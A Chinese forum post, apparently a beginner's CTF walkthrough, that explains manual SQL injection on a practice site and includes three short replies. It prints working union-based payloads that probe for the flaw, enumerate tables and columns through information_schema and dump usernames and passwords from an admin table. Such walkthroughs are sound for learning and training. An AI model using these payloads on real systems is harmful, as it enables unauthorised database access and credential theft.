第一章:为了女神小芳! 过程讲解

detached   ·   发表于 2019-04-07 16:21:15   ·   CTF&WP专版

咳咳,开始正文,,刚开始我初次接触web安全,一开始做这道题,  难死我了,,啥都不会,啥都不懂,。跟着视频慢慢走,模仿做,刚开始我是放弃了,应为手工注入那一行行语法,压根看不懂。时间久了。我再次来使。我已经有了一定的基础。


那么进入正题



第一步:


看网站是否存在sql注入漏洞   咳咳,,这不是废话,,题目肯定存在呀。。!!

判断注入漏洞    

1、  在id=1 后面加一个’    然后页面回显错误  存在注入漏洞

2、 在id=1 后面输入 and 1 = 1 回显正常 and 1=2回显错误  存在注入漏洞    (凑合看,图片顺序好像是倒着放的)


然后现在已经确定,存在注入漏洞   !!

 sql注入漏洞    顺序  

1、判断是否存在注入漏洞   用 ’ and 1=1 and 1=2 进行判断

2、猜字段  order by 1,2,3...  知道页面出错 然后判断 出错之前的那个数 可以判断出字段    这里出错的是3 可以判断它只有2个字段,利用哪一个都可以

3、爆表名  and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

     讲一下,    这里爆表名 的意思是只  数据库里面有多少个表,全给它显示出来    数据库分为  表  表里面存着admin password 的表

  意思就是,你有一本书,书里面你夹了1000块钱    这个是有个叫admin 的表,, 这个表里面存放着用户的账号和密码  。

  这个数据库一共有4个表          admin,dirs,news,xss   一般来说我们只是获取后台的账号和密码  admin 里肯定存放着!

 

4、爆字段名   通俗点就是,,  爆表里面的内容!!

     and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'#


 咳咳  又到了讲解时刻,   我们已经成功得到了admin表里面的内容,离我们获取账号和密码不远了,    and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='这里面写的是要查看的表名'# 

     

 5、 爆内容。  哈哈总算是要爆内容了,,这个网站账号密码要让我猜出来了 哈哈哈哈

  老规矩  id=1 后面写

  and 1=2 union select 1,group_concat(username,password) from admin#

 讲一下,,  这段的意思是,  联合查询,  查 username password 内容 从 一个叫admin的表里面查询。

  and 1=2 union select 1,group_concat(这里写要查的字段名记得用,逗号隔开 切记英文) from admin#

 

打赏我,让我更有动力~

3 条回复   |  直到 2019-4-26 | 5699 次浏览

我想成为骑猪的人
发表于 2019-4-12

感谢大佬.不然按照原本的解题思路,有的地方参数写进去网页没回显.现在看大佬的帖子就知道了用这些参数就可以进行把所有的表名,字段名,账号密码全部爆出来

评论列表

  • 加载数据中...

编写评论内容

冰封小天堂
发表于 2019-4-21

大佬,为什么每次都要加上and=2啊??

评论列表

  • 加载数据中...

编写评论内容

detached
发表于 2019-4-26

 

@冰封小天堂我自己的理解是,利用这个报错点,输入sql语句查询数据库,如果不加 的话是没有回显的。

 

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.